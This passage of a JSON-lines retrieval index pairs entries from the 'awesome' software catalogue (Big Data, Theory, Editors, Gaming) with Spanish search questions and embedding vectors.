0.02364, -0.04748]} -{"tipo": "pregunta", "herramienta": "Big Data", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Big Data", "tema": "big data", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Big Data: Big Data. Public Datasets. Hadoop β€” Framework for distributed storage and processing of very large data sets. Data Engineering. Streaming. Apache Spark β€” Unified engine for large-scale data processing. Qlik β€” Business intelligence platform for data visualization, analytics, and reporting apps. Splunk β€” Platform for searching, monitoring, and analyzing structured and unstructured machine-generated big data in real time. Network Analysis.", "indexar": "con quΓ© puedo visualizar y analizar datos en tiempo real de forma automΓ‘tica?", "v": [-0.06486, 0.2082, -0.10067, -0.02191, 0.05263, -0.01217, 0.01915, -0.05644, -0.17792, -0.01894, 0.00869, -0.21782, 0.01703, -0.03164, 0.09733, 0.06684, 0.06543, -0.13071, -0.0002, 0.03529, 0.10175, -0.21586, -0.11155, -0.03449, -0.05971, -0.0382, 0.06702, 0.02536, -0.12179, 0.04822, 0.04828, 0.1049, -0.03874, -0.056, -0.01285, 0.04963, 0.00107, 0.13894, -0.03582, -0.06987, 0.05283, 0.04304, -0.05113, 0.03966, 0.07702, 0.01165, -0.09454, 0.0279, -0.08739, -0.08305, -0.01989, 0.06258, -0.02269, -0.02124, -0.04081, -0.1312, 0.13717, -0.04208, 0.16506, -0.09512, -0.02993, 0.09385, -0.03391, 0.03539, 0.00807, 0.03884, 0.11073, 0.014, 0.00973, 0.00347, -0.07571, -0.029, -0.08689, -0.04258, 0.09165, 0.01508, 0.00317, 0.09349, 0.02783, 0.01148, -9e-05, -0.03643, -0.08286, 0.07843, -0.01009, -0.01536, 0.02518, -0.06469, -0.00344, -0.07098, 0.04736, 0.05347, 0.05363, 0.04893, 0.01182, 0.07183, 0.01878, -0.09158, -0.0472, 0.06465, 0.03, -0.00366, -0.09447, 0.12034, 0.05992, 0.10414, -0.00365, -0.02169, -0.03293, -0.04279, -0.07456, 0.00192, -0.09909, -0.09587, 0.07004, -0.05813, -0.00115, -0.04793, -0.07655, -0.00587, 0.0209, 0.01462, 0.01183, -0.06839, -0.0181, -0.05247, -0.02896, 0.02477, 0.00495, 0.0235, 0.00572, 0.02581, -0.13005, -0.05438, -0.00154, 0.03439, -0.07807, -0.02383, 0.02019, -0.12611, -0.00096, 0.07743, -0.0664, -0.02697, 0.03553, -0.05403, -0.03008, -0.01781, -0.0915, -0.03217, 0.03135, 0.031, 0.08801, 0.0976, -0.00435, 0.02197, -0.01638, -0.0376, -0.02882, 0.02352, 0.02561, 0.04851, -0.03379, -0.01005, 0.02387, -0.05711, 0.02715, -0.04324, 0.10367, -0.00475, -0.02612, 0.035, 0.01578, -0.07048, -0.01483, 0.01132, -0.03237, -0.0957, -0.02831, -0.10835, 0.00581, -0.02259, -0.0349, -0.04035, -0.04232, 0.00354, 0.00781, -0.02975, 0.02873, 0.01578, 0.0455, 0.07954, 0.05969, 0.01478, 0.03078, -0.05428, -0.02232, 0.02801, 0.04014, -0.04607, -0.08439, -0.0232, 0.00658, 0.00636, -0.01998, 0.11455, -0.05125, 0.08333, 0.01167, -0.00924, -0.01027, -0.02587, 0.06944, -0.07228, -0.0429, -0.02797, 0.04796, -0.04443, -0.03216, 0.01794, -0.02197, 0.06647, 0.09909, -0.04475, -0.0511, 0.00223, 0.06627, 0.09456, 0.02023, 0.00524, -0.08637, 0.08435, 0.00221, -0.00154, 0.05132, -0.00209, 0.01472, -0.06142, -0.06672, -0.08407, 0.07069, 0.0848, -0.04088, -0.00411, -0.03236, -0.06378, -0.11295, 0.02966, 0.00227, -0.10379, -0.05598, 0.03163, 0.03814, -0.02599, 0.04856, -0.05274]} -{"tipo": "pregunta", "herramienta": "Big Data", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Big Data", "tema": "big data", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Big Data: Big Data. Public Datasets. Hadoop β€” Framework for distributed storage and processing of very large data sets. Data Engineering. Streaming. Apache Spark β€” Unified engine for large-scale data processing. Qlik β€” Business intelligence platform for data visualization, analytics, and reporting apps. Splunk β€” Platform for searching, monitoring, and analyzing structured and unstructured machine-generated big data in real time. Network Analysis.", "indexar": "cuΓ‘l es una alternativa gratuita a los servicios de inteligencia empresarial para reportes?", "v": [-0.00545, 0.04884, -0.00826, -0.15894, 0.08487, -0.17704, -0.05298, -0.11644, -0.27122, -0.0553, -0.04396, -0.12989, -0.02429, 0.00961, 0.05391, 0.0609, 0.15756, -0.051, 0.02758, -0.09546, -0.00247, 0.01853, -0.10652, 0.03346, -0.12725, -0.07159, -0.16336, 0.01696, -0.00592, 0.09545, 0.01399, -0.09487, 0.03626, -0.09041, -0.09917, 0.05162, 0.07222, 0.08087, 0.12102, -0.06605, 0.02897, -0.11428, 0.06453, 0.08476, 0.12464, -0.02095, -0.08651, -0.00845, 0.07625, 0.12917, -0.0884, -0.09184, -0.00111, -0.05607, 0.0579, 0.02662, -0.02497, -0.03858, -0.10911, -0.08427, -0.0464, 0.07985, -0.09816, 0.08853, -0.00147, 0.00686, -0.05335, -0.05317, -0.03784, -0.01441, 0.05504, -0.08105, -0.04897, -0.01844, -0.06415, -0.01397, 0.01211, 0.04401, -0.03358, 0.13262, 0.04339, -0.05617, -0.05759, 0.01597, 0.02007, -0.13817, -0.0488, -0.02995, -0.00275, -0.03326, 0.00663, 0.10429, 0.00535, 0.06619, -0.09992, 0.03928, 0.13794, -0.01131, -0.10749, 0.05203, 0.00404, -0.00279, -0.15518, 0.0473, -0.03877, 0.07047, -0.08825, 0.00526, -0.10252, -0.04775, -0.01457, 0.01072, 0.03796, 0.08001, -0.06798, -0.01279, -0.01832, -0.00734, 0.02158, 0.07823, -0.03789, -0.00358, 0.02712, -0.03952, -0.04103, -0.03758, 0.03578, 0.02784, 0.07071, -0.06933, 0.01334, -0.09161, -0.0487, -0.04586, -0.02898, -0.01647, 0.02244, -0.02111, 0.01225, 0.01048, -0.00262, 0.0118, 0.01727, -0.0071, 0.04358, -0.03346, 0.06712, -0.02417, 0.03683, 0.01213, -0.00944, -0.00563, -0.10291, 0.06724, -0.04789, -0.04466, -0.01865, -0.06786, -0.05047, 0.11891, 0.07125, -0.07563, 0.00329, 0.06134, 0.02152, -0.09015, 0.01777, -0.02374, -0.02299, 0.08626, -0.07631, 0.03011, -0.00319, -0.09148, 0.0165, -0.02727, -0.01747, 0.0089, 0.01084, -0.07942, 0.00134, -0.04047, -0.05265, 0.00184, -0.01734, -0.03174, 0.00844, -0.01439, -0.00023, 0.03006, -0.06552, 0.02417, -0.02601, -0.00941, 0.07783, -0.06151, -0.0273, -0.09338, -0.03846, 0.00309, -0.08684, -0.00824, -0.11288, 0.03149, -0.05746, 0.03789, 0.08213, 0.04844, -0.01784, 0.05903, -0.04963, -0.02044, 0.04843, -0.05002, -0.03656, 0.02406, -0.03298, -0.05864, 0.01871, 0.00415, 0.00755, -0.06887, 0.02368, 0.01938, -0.04171, 0.04239, 0.04014, 0.07361, -0.05908, -0.02949, 0.0204, 0.05527, 0.01765, 0.00977, -0.02602, -0.02816, -0.03383, -0.00549, 0.03834, -0.00693, 0.02465, 0.06811, -0.03101, 0.003, -0.07881, -0.01213, -0.04339, -0.01563, -0.05859, -0.06874, -0.06975, 0.09322, -0.00605, -0.00081, 0.00719, 0.00095]} -{"tipo": "pregunta", "herramienta": "Theory", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Theory", "tema": "theory", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Theory: Papers We Love. Talks. Algorithms. Education β€” Learning and practicing. Algorithm Visualizations. Artificial Intelligence. Search Engine Optimization. Competitive Programming. Math. Recursion Schemes β€” Traversing nested data structures. Audit Algorithms β€” Algorithmic audits of algorithms. AGI & CoCoSci β€” The reciprocation of Artificial General Intelligence (AGI) and Computational Cognitive Sciences (CoCoSci). Complex Systems β€” The scientific field studying systems with multiple interacting parts and emergent properties. VLM Architectures β€” Vision Language Model architectures.", "indexar": "quΓ© herramientas me ayudan a visualizar algoritmos complejos?", "v": [0.21167, 0.11351, -0.06432, -0.16029, 0.08481, -0.05111, -0.012, 0.00881, -0.06242, -0.08732, -0.00676, -0.07118, 0.07539, -0.01357, 0.1775, -0.02791, 0.11172, -0.10451, -0.04517, 0.03106, 0.02347, -0.01101, -0.17779, -0.01163, -0.06704, -0.12534, 0.07469, 0.05311, -0.14822, 0.10132, -0.05092, 0.08723, 0.05247, -0.06035, -0.08083, -0.02062, -0.1275, 0.05787, 0.00729, 0.02021, -0.03652, 0.03515, -0.01535, 0.01788, 0.0671, -0.0378, -0.14338, 0.07779, 0.00834, -0.04618, -0.1226, -0.06759, -0.08826, -0.08177, 0.04398, -0.17573, 0.15503, -0.07299, 0.01472, -0.09106, -0.06588, 0.04477, 0.02923, 0.10274, -0.05515, -0.02178, -0.00778, 0.00395, -0.03168, 0.09009, -0.07394, 0.04826, 0.01556, 0.05074, -0.01449, 0.06064, 0.05488, 0.00084, 0.07628, -0.00901, 0.05104, -0.00463, -0.01315, 0.04186, -0.03912, -0.08217, -0.05543, 0.02337, -0.00202, -0.15802, -0.05267, 0.02839, 0.00806, 0.02123, 0.05801, 0.15988, 0.1166, -0.02674, -0.01292, 0.0915, 0.06095, -0.12913, -0.02837, -0.00868, -0.04888, 0.05194, 0.00718, 0.00271, -0.09309, -0.02767, 0.03855, -0.01293, 0.00074, 0.0239, -0.00821, 0.04921, 0.04266, 0.02126, -0.02502, -0.09639, 0.1026, 0.08777, -0.01804, -0.04948, 0.00156, 0.02846, 0.03893, 0.0913, 0.02663, -0.10029, -0.07084, -0.03596, -0.10161, 0.01754, 0.00372, 0.02795, 0.09326, -0.17185, -0.06218, 0.0154, -0.02192, 0.00926, -0.02955, -0.13165, 0.04679, -0.01246, 0.09764, -0.0769, -0.06214, -0.00606, 0.10521, -0.06067, 0.03536, 0.01223, -0.05063, -0.06147, -0.04406, -0.04235, -0.07377, 0.00277, -0.01005, 0.01492, 0.02248, 0.03669, 0.0037, -0.04224, 0.06278, 0.0287, -0.01327, 0.039, -0.03003, 0.0431, -0.02513, -0.03635, -0.0166, 0.05861, -0.05314, 0.01077, -0.05497, 0.03348, -0.03065, 0.00282, 0.00817, -0.04997, -0.01159, -0.04659, -0.02121, -0.05632, -0.02421, 0.03572, -0.02524, 0.05455, -0.03578, -0.05176, 0.07619, 0.00039, -0.06655, -0.02666, 0.03033, -0.02522, 0.02508, 0.01427, 0.01544, -0.03828, -0.01578, 0.11485, -0.05056, -0.03014, -0.0109, 0.00457, 0.00421, -0.03292, 0.01226, -0.04454, -0.02249, 0.01874, -0.05747, 0.03922, -0.01075, -0.00674, 0.03069, 0.00479, 0.06073, -0.02123, -0.00747, 0.04199, 0.02013, 0.10595, 0.02329, -0.05816, -0.03985, -0.04901, -0.07014, 0.02113, 0.01409, -0.03734, -0.01767, -0.05416, -0.02069, -0.01157, -0.02722, 0.01591, 0.03504, -0.07716, -0.02002, -0.0757, 0.00633, -0.01885, -0.07588, -0.01219, -0.08109, 0.03652, 0.03937, -0.0699, 0.06243, -0.03339]} -{"tipo": "pregunta", "herramienta": "Theory", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Theory", "tema": "theory", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Theory: Papers We Love. Talks. Algorithms. Education β€” Learning and practicing. Algorithm Visualizations. Artificial Intelligence. Search Engine Optimization. Competitive Programming. Math. Recursion Schemes β€” Traversing nested data structures. Audit Algorithms β€” Algorithmic audits of algorithms. AGI & CoCoSci β€” The reciprocation of Artificial General Intelligence (AGI) and Computational Cognitive Sciences (CoCoSci). Complex Systems β€” The scientific field studying systems with multiple interacting parts and emergent properties. VLM Architectures β€” Vision Language Model architectures.", "indexar": "cΓ³mo puedo aprender sobre sistemas complejos y sus propiedades emergentes?", "v": [0.06044, 0.13407, -0.06739, -0.1632, 0.11423, -0.05642, 0.03525, -0.05873, -0.14727, -0.08917, -0.05661, 0.1021, -0.05187, -0.00271, 0.12857, 0.01462, 0.08316, -0.09368, -0.07682, 0.01388, -0.01558, -0.13314, -0.11652, -0.03599, -0.04011, 0.01673, 0.05986, 0.02867, -0.00762, 0.10518, -0.02787, 0.13662, 0.09303, -0.1346, -0.17524, 0.04235, -0.0689, 0.02937, -0.04884, -0.06487, 0.01462, -0.03278, 0.01869, 0.02058, 0.07794, 0.03895, -0.16115, -0.04211, -0.05105, -0.12039, -0.1222, 0.09878, -0.04935, -0.06564, 0.12076, -0.12773, 0.09402, -0.07715, 0.09712, 0.06639, 0.01666, 0.07533, 0.02028, -0.01397, 0.04463, -0.1255, -0.03758, 0.07143, -0.03825, -0.00656, -0.03039, -0.02476, 0.00838, 0.00575, -0.04351, 0.06802, 0.04132, -0.03461, 0.07093, -0.06737, -0.09907, 0.03227, -0.10918, -0.01983, -0.01517, -0.12279, -0.06642, -0.09461, 0.01754, -0.0656, -0.02668, 0.01553, 0.00395, -0.04305, -0.0042, 0.01235, 0.00358, 0.02144, -0.02326, 0.061, -0.05349, -0.02761, -0.00259, 0.06793, -0.05502, 0.11003, 0.05324, -0.05589, -0.07709, -0.07741, -0.14455, 0.03024, -0.04473, -0.02997, -0.04529, 0.00469, 0.00178, 0.03595, -0.1033, 0.01145, -0.05278, -0.01271, 0.04493, -0.03783, 0.00861, -0.01057, -0.0169, 0.09358, -0.00305, -0.0095, -0.04643, -0.00486, 0.0082, -0.01931, 0.07805, -0.00766, 0.10015, 0.07073, -0.06191, -0.09601, -0.01982, 0.05155, -0.0026, -0.0948, -0.03253, 0.08947, 0.1069, -0.09936, -0.06527, 0.00525, -0.0435, -0.04504, 0.0075, -0.01324, -0.00263, -0.07993, 0.05831, -0.11981, 0.01627, -0.01512, 0.01052, 0.12386, 0.0027, -0.02918, 0.01353, -0.04117, -0.02226, 0.02617, 0.02227, 0.03372, 0.01656, 0.03507, 0.05414, -0.02655, -0.02765, -0.10059, -0.01437, -0.03098, -0.04147, -0.02825, -0.09915, -0.01264, -0.07095, -0.04598, -0.00834, 0.03193, -0.05562, -0.0427, -0.00588, 0.06867, 0.01149, 0.04976, -0.06064, -0.05068, 0.00079, 0.0024, -0.09628, -0.0616, -0.02105, -0.00841, -0.06085, 0.05009, 0.07003, -0.02783, 0.06076, 0.05585, 0.0144, 0.01848, -0.01823, 0.01428, 0.06275, 0.01801, 0.09212, -0.04819, -0.05406, -0.02275, -0.03219, 0.06088, -0.03404, -0.01556, 0.0816, 0.04543, 0.0755, -0.00945, 0.03412, 0.00327, -0.02373, 0.0734, 0.04229, 0.06166, -0.01594, -0.02059, -0.00348, -0.03303, 0.08052, 0.04723, 0.02484, 0.00969, -0.0481, -0.01416, 0.05134, 0.12058, 0.03813, -0.08139, -0.04061, -0.06229, -0.06295, -0.01255, 0.00546, -0.10428, -0.01488, -0.00659, 0.07911, -0.02469, 0.01251, -0.01621]} -{"tipo": "pregunta", "herramienta": "Theory", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Theory", "tema": "theory", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Theory: Papers We Love. Talks. Algorithms. Education β€” Learning and practicing. Algorithm Visualizations. Artificial Intelligence. Search Engine Optimization. Competitive Programming. Math. Recursion Schemes β€” Traversing nested data structures. Audit Algorithms β€” Algorithmic audits of algorithms. AGI & CoCoSci β€” The reciprocation of Artificial General Intelligence (AGI) and Computational Cognitive Sciences (CoCoSci). Complex Systems β€” The scientific field studying systems with multiple interacting parts and emergent properties. VLM Architectures β€” Vision Language Model architectures.", "indexar": "cuΓ‘les son las mejores tΓ©cnicas para auditar algoritmos?", "v": [0.22441, -0.02639, 0.06061, -0.08529, 0.13253, -0.1003, 0.0238, -0.05598, -0.10879, 0.07257, -0.1318, -0.10573, 0.02567, 0.08683, 0.12048, -0.06172, 0.09845, -0.16036, 0.02539, 0.0366, 0.01594, -0.0306, -0.11248, 0.01867, -0.14057, -0.06119, 0.11246, 0.03244, -0.05769, 0.05478, -0.05244, 0.07538, 0.08894, -0.07558, -0.16259, -0.00403, 0.07678, 0.06637, -0.0198, 0.13059, -0.06326, -0.03273, -0.05281, 0.00628, 0.17482, -0.02976, -0.09405, 0.1433, 0.06423, -0.13169, -0.0568, 0.09116, 0.01836, -0.0085, -0.01063, -0.13179, -0.00163, -0.03933, 0.08863, -0.17012, -0.02585, -0.00536, -0.03135, 0.03888, -0.03393, -0.05478, -0.03371, 0.02644, 0.00086, 0.04841, -0.03663, -0.00357, 0.00835, 0.10432, 0.00958, 0.08857, 0.02866, 0.02604, 0.00411, -0.04558, 0.0079, -0.08917, -0.03814, 0.02651, -0.13523, -0.00567, -0.00278, -0.00947, -0.07008, -0.11444, -0.04773, -0.01729, 0.02448, -0.00384, -0.03352, 0.08865, 0.1688, -0.07329, -0.01976, -0.02507, 0.02759, -0.0993, -0.05058, 0.03935, -0.0029, 0.13793, 0.00797, -0.01549, -0.00853, -0.09226, -0.05451, -0.01217, -0.12201, -0.01304, -0.08808, -0.03227, 0.01592, -0.04603, 0.01551, 0.0019, 0.03706, 0.00464, -0.07644, -0.00239, 0.0009, 0.0208, 0.10193, 0.05097, 0.02799, -0.02324, -0.02875, -0.00054, -0.09015, -0.02535, -0.03436, 0.01515, 0.05045, -0.0172, -0.10427, 0.02408, -0.08215, 0.01522, -0.00698, -0.03635, -0.00672, 0.00923, 0.05223, -0.06105, -0.11595, -0.04826, 0.05985, -0.04752, -0.04873, -0.00941, -0.09131, -0.05601, -0.06844, -0.10641, -0.02284, 0.04782, 0.01483, 0.00248, -0.00596, 0.04907, 0.06096, 0.04006, 0.02968, 0.00898, -0.004, -0.04798, -0.03342, 0.09535, -0.11225, -0.07428, 0.04405, 0.04458, -0.02095, -0.05673, 0.03291, -0.03171, -0.07659, 0.03075, -0.01274, -0.07988, 0.03203, -0.01266, 0.01622, -0.00495, 0.04167, 0.06714, -0.00698, -0.06495, 0.00707, 0.00174, 0.044, -0.05967, -0.01659, -0.04107, -0.07421, 0.01579, -0.053, -0.02752, -0.04608, -0.05005, 0.02882, 0.10188, 0.02877, -0.04019, -0.00956, -0.02296, 0.01716, -0.04349, 0.00353, -0.07524, -0.03196, 0.02717, -0.08491, -0.07725, -0.03431, 0.04073, 0.00833, -0.02962, 0.02258, -0.02532, -0.02181, 0.0209, 0.01826, 0.04662, 0.03004, -0.02535, -0.044, 0.00998, 0.00349, 0.02026, -0.00718, 0.02862, -0.03036, -0.06452, 0.02795, -0.0722, -0.01384, 0.00369, 0.03537, -0.07701, -0.00752, -0.04874, -0.03622, 0.0203, -0.04403, -0.03522, -0.01668, 0.03858, 0.08413, -0.024, 0.04744, -0.05886]} -{"tipo": "pregunta", "herramienta": "Editors", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Editors", "tema": "editors", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Editors: Sublime Text. Vim. Neovim β€” Vim-fork focused on extensibility and usability. Emacs. Visual Studio Code β€” Cross-platform open-source text editor.", "indexar": "que programa de texto es mejor para escribir cΓ³digo?", "v": [-0.05134, 0.01045, -0.02847, -0.13542, 0.00062, -0.25419, -0.04918, 0.00378, 0.01863, -0.08808, -0.00779, -0.10345, 0.01041, -0.13652, 0.03774, -0.04479, 0.17192, -0.01598, 0.12669, 0.02191, 0.03026, -0.06954, -0.08605, -0.04685, 0.00474, -0.07434, -0.06413, 0.00678, -0.01805, 0.03075, -0.03444, -0.00027, 0.07298, -0.09063, -0.04096, 0.14734, 0.15211, 0.09741, -0.0472, 0.1491, 0.00955, 0.15124, 0.01334, 0.06474, -0.0064, -0.07421, 0.14281, 0.05044, -0.00976, -0.05159, 0.0098, -0.06387, 0.06761, 0.00621, -0.02874, 0.08159, 0.04064, -0.07815, -0.12782, 0.02051, 0.10931, -0.01835, -0.04549, -0.15969, -0.05151, 0.01751, 0.10709, -0.00314, -0.06115, 0.09497, 0.04171, 0.00091, -0.04885, 0.01733, 0.01933, 0.05654, -0.09165, -0.09449, 0.03524, 0.08401, -0.02931, 0.0047, -0.04685, 0.07289, 0.04731, 0.00321, -0.05447, -0.07685, -0.01811, 0.00626, 0.08769, -0.0838, 0.0359, 0.02036, 0.05028, -0.02826, 0.0837, -0.0274, 0.07848, 0.10938, 0.04564, -0.14727, 0.03243, 0.03025, 0.06533, 0.06544, 0.02995, 0.03827, 0.03254, 0.0203, -0.01551, -0.07652, -0.09382, 0.01768, -0.08431, -0.02973, 0.0032, 0.01434, 0.06184, -0.12296, -0.11807, 0.07229, -0.13395, 0.01865, 0.1289, 0.07858, 0.02709, 0.06776, -0.06047, 0.03996, -0.06169, 0.02264, -0.02046, -0.03337, 0.0086, 0.03067, 0.08608, 0.07827, 0.01557, 0.04016, -0.06093, 0.00493, -0.02285, 0.11814, -0.07406, 0.03721, -0.02045, -0.05263, -0.00988, 0.02235, -0.03515, 0.05607, -0.00273, -0.00889, -0.07053, -0.0124, 0.0336, 0.03182, -0.10215, -0.01465, -0.0892, -0.01994, -0.05777, -0.03988, 0.06185, 0.01593, -0.00081, -0.00944, 0.0313, 0.03415, 0.00167, 0.02305, 0.14208, -0.05184, 0.02618, 0.02016, 0.02805, 0.02424, -0.08143, 0.01076, -0.06244, 0.04177, 0.06583, 0.01002, 0.04721, 0.02201, 0.044, 0.05624, -0.00153, -0.06829, -0.02274, -0.0203, 0.03696, -0.01353, -0.02231, -0.01331, -0.03705, -0.00121, 0.04805, -0.11597, -0.05487, 0.01644, 0.01251, -0.00394, 0.02804, 0.06339, -0.0472, -0.05609, 0.0169, 0.07581, 0.04132, -0.01763, -0.01979, 0.05484, -0.03576, -0.00529, -0.04602, 0.08379, 0.09842, 0.02291, 0.03818, -0.05225, -0.00706, -0.01454, 0.00499, -0.10104, -0.02579, 0.04611, -6e-05, 0.04589, -0.01147, -0.06769, -0.00061, 0.02422, 0.00465, 0.00637, -0.04803, -0.03145, -0.00534, -0.05997, -0.02731, 0.0114, -0.00021, -0.07932, 0.00834, 0.07049, -0.06574, -0.02681, -0.03802, 0.0295, -0.0286, -0.09278, 0.02739, -0.04238, 0.06806, 0.05443]} -{"tipo": "pregunta", "herramienta": "Editors", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Editors", "tema": "editors", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Editors: Sublime Text. Vim. Neovim β€” Vim-fork focused on extensibility and usability. Emacs. Visual Studio Code β€” Cross-platform open-source text editor.", "indexar": "con que puedo montar un editor ligero pero potente?", "v": [0.01373, 0.00221, -0.25602, 0.0065, -0.11437, 0.08572, 0.00867, 0.12252, -0.244, -0.25594, 0.04685, 0.11067, 0.11574, -0.0497, 0.04287, 0.07033, 0.01111, -0.11478, 0.01945, -0.06778, 0.03412, -0.06962, -0.01876, -0.20889, 0.15792, 0.0057, 0.11423, 0.04477, -0.07291, -0.05724, -0.05801, 0.17649, 0.04601, 0.03588, -0.00549, -0.0709, 0.00191, 0.03463, -0.00064, 0.1367, 0.03318, 0.03609, -0.00082, 0.02502, 0.02489, 0.02986, 0.0463, -0.00394, 0.0901, 0.07732, 0.01758, -0.02316, -0.07963, -0.00979, -0.0177, -0.03304, 0.11434, -0.01879, 0.04087, -0.07678, 0.06959, 0.19117, -0.01803, 0.0107, -0.00176, 0.02738, -0.02652, -0.12856, -0.11873, -0.00306, -0.05343, -0.05065, 0.05582, 0.04114, -0.07921, 0.04768, -0.05247, 0.00425, -0.03269, 0.05827, 0.02375, 0.01358, -0.01439, 0.09092, -0.03711, -0.09403, -0.00413, -0.19407, -0.05284, -0.00177, 0.06553, 0.01464, 0.03323, -0.07619, 0.00348, -0.00863, 0.09382, 0.03672, 0.01823, -0.00579, -0.02377, -0.00984, 0.05505, 0.16677, 0.08911, -0.07235, 0.02625, 0.00971, 0.03379, -0.01852, 0.04262, 0.06036, -0.01158, 0.0405, -0.02683, -0.01744, -0.01652, -0.01062, -0.05743, -0.0684, 0.00436, 0.08487, 0.00083, 0.0387, 0.04113, 0.03286, 0.05164, 0.03146, -0.03896, -0.02309, -0.0056, 0.0425, 0.00817, -0.06894, -0.01859, 0.02022, -0.00728, 0.02372, 0.00056, -0.00493, -0.03178, 0.04072, -0.04902, -0.05444, 0.0316, 0.06611, -0.04438, -0.01662, -0.04557, 0.00652, 0.12996, 0.01596, -0.0087, 0.02737, -0.06615, 0.02168, 0.07173, 0.02201, 0.01025, 0.05302, -0.02503, 0.07154, -0.02174, -0.00864, 0.0263, -0.00328, -0.09051, -0.06237, 0.02335, -0.00754, -0.0397, 0.03691, 0.06949, 0.02169, 0.08675, 0.02098, -0.03815, 0.06418, 0.00944, 0.01682, 0.02748, 0.05499, -0.05981, 0.07763, -0.00312, 0.04857, 0.04614, -0.03877, -0.00204, 0.00524, 0.00426, 0.06253, -0.00123, -0.05867, 0.04455, 0.00287, -0.05336, -0.02599, -0.00012, -0.02472, -0.02881, -0.01531, 0.00014, 0.00949, 0.00592, -0.05452, -0.03876, 0.1198, 0.01501, 0.0597, -0.01494, 0.03629, -0.00703, -0.03878, -0.03978, 0.02619, 0.05006, -0.0362, -0.05083, 0.05962, 0.03045, 0.0355, 0.10928, 0.02916, 0.08899, -0.03058, -0.02565, -0.04483, 0.00949, 0.06089, 0.00039, 0.00095, -0.02917, 0.01071, -0.02337, 0.02296, 0.06775, 0.06711, -0.06382, 0.01104, 0.0149, 0.01189, 0.05207, 0.00567, -0.04416, -0.02048, -0.00322, -0.01683, -0.0766, -0.04204, 0.01664, 0.02508, 0.04291, -0.10312, -0.00616, 0.01463]} -{"tipo": "pregunta", "herramienta": "Editors", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Editors", "tema": "editors", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Editors: Sublime Text. Vim. Neovim β€” Vim-fork focused on extensibility and usability. Emacs. Visual Studio Code β€” Cross-platform open-source text editor.", "indexar": "cual es una alternativa libre a los editores tradicionales?", "v": [0.16755, 0.03317, -0.03124, 0.09898, -0.01929, 0.09309, 0.08535, -0.05827, -0.11934, -0.07669, -0.06254, -0.06686, -0.00209, -0.04511, 0.08181, -0.06324, 0.12918, -0.05755, 0.1624, -0.02345, -0.01505, -0.01632, -0.10521, -0.02979, 0.02572, -0.14557, 0.00496, 0.0587, -0.03813, 0.06133, 0.01503, 0.09923, 0.07218, -0.07461, -0.02469, 0.02315, 0.06983, 0.09987, -0.0985, -0.04119, 0.07333, -0.0658, -0.06242, -0.00546, -0.02971, -0.03884, -0.08212, 0.08573, -0.00751, 0.10411, -0.03322, 0.01789, -0.05789, 0.04015, 0.10426, -0.04852, 0.15047, -0.04768, -0.1162, 0.02942, -0.03256, 0.15945, 0.09341, -0.05336, 0.0409, -0.00153, -0.06001, -0.13106, -0.07081, 0.07074, 0.06625, 0.03239, 0.04963, -0.00114, -0.09396, 0.08231, -0.08631, -0.01738, -0.0376, 0.03039, 0.05011, -0.05663, 0.06661, 0.04664, -0.02986, -0.10088, 0.01605, -0.17698, -0.14302, 0.00063, 0.03499, 0.02897, 0.00456, 0.05227, -0.01843, -0.11428, 0.05503, 0.01403, 0.04089, 0.15573, 0.07714, -0.01984, -0.05063, 0.0064, 5e-05, -0.06825, 0.05896, 0.00082, -0.01622, 0.03594, 0.01691, 0.08295, 0.0174, 0.06936, -0.02311, 0.02043, -0.03347, 0.00436, 0.01469, -0.0154, -0.05049, 0.00511, -0.02862, -0.02305, 0.02436, 0.03817, 0.00254, 0.07017, -0.0575, 0.04789, 0.01865, -0.01299, -0.01301, -0.03758, -0.13179, -0.03171, 0.1264, -0.06377, 0.02801, -0.03418, -0.02134, 0.0305, -0.02038, -0.06658, 0.08486, -0.021, 0.01216, -0.067, -0.08172, -0.03525, -0.09699, 0.01882, -0.07174, 0.11941, -0.03055, 0.04828, -0.05646, -0.05043, -0.06668, 0.15541, 0.02082, -0.04603, 0.04303, -0.06329, -0.05749, -0.03262, 0.02074, -0.08641, -0.0162, -0.05569, -0.03763, 0.04632, 0.00063, -0.05165, 0.08607, -0.01828, -0.06887, -0.0473, 0.11016, 0.00418, 0.00254, 0.0663, -0.15222, -0.04432, 0.01746, -0.06316, 0.01698, -0.0108, 0.02537, 0.03235, -0.00797, 0.04932, -0.08463, -0.12867, -0.03451, 0.0166, -0.03939, -0.03726, 0.00133, -0.01722, -0.06419, 0.03094, -0.0007, -0.03182, 0.00914, 0.01591, -0.04698, 0.05124, -0.02189, 0.08595, 0.00033, -0.01116, 0.03923, 0.01766, -0.05483, 0.01975, 0.04658, -0.09514, -0.00922, 0.00586, 0.11787, 0.00158, 0.05818, -0.01879, 0.02169, -0.02103, 0.0687, 0.09466, -0.02563, 0.02909, -0.02199, -0.01111, -0.06055, 0.01068, 0.05398, 0.05719, 0.03813, 0.00318, -0.04629, -0.01924, 0.06213, 0.05324, -0.05101, 0.00276, -0.01355, -0.0133, -0.10102, -0.04156, -0.06076, -0.03016, -0.04233, 0.07521, 0.04881, -0.02472, 0.04143, -0.04501]} -{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Development. Game Talks. Godot β€” Game engine. Open Source Games. Unity β€” Game 